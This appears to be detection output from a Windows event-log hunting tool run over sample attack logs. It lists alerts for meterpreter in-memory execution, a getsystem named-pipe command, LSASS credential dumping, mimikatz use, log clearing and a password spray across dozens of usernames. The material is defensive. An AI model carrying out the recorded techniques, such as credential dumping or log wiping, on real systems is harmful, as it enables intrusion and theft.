+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 
+09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 
0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:thessman/edygert/rbowes/jwright/celgee/ebooth/cmoody/tbennett/melliott/jlake/cfleener/psmith/drook/dpendolino/Administrator/wstrzelec/mdouglas/cspizor/cragoso/bhostetler/jleytevidal/sarmstrong/baker/gsalinas/lschifano/cdavis/jorchilles/bking/ssims/zmathis/econrad/smisenar/eskoudis/mtoussain/dmashburn/kperryman/jkulikowski/bgreenwood/lpesce/sanson/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
